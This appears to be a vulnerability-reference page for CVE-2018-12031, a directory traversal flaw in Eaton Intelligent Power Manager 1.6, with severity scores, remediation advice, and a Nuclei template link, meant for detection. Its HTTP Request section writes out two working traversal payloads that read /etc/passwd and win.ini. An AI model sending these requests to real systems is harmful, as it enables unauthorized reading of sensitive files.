🔙 목록으로 돌아가기

CVE-2018-12031: Eaton Intelligent Power Manager 1.6 - Directory Traversal

TitleEaton Intelligent Power Manager 1.6 - Directory Traversal
Authordaffainfo
SeverityCritical
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
RemediationApply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.74839
CVE IDCVE-2018-12031
CWE IDCWE-22
Tags cve cve2018 edb lfi eaton vkev vuln

🔍 Vulnerability Description

Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.

🌐 HTTP Request

GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.6
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12031.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-12031.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A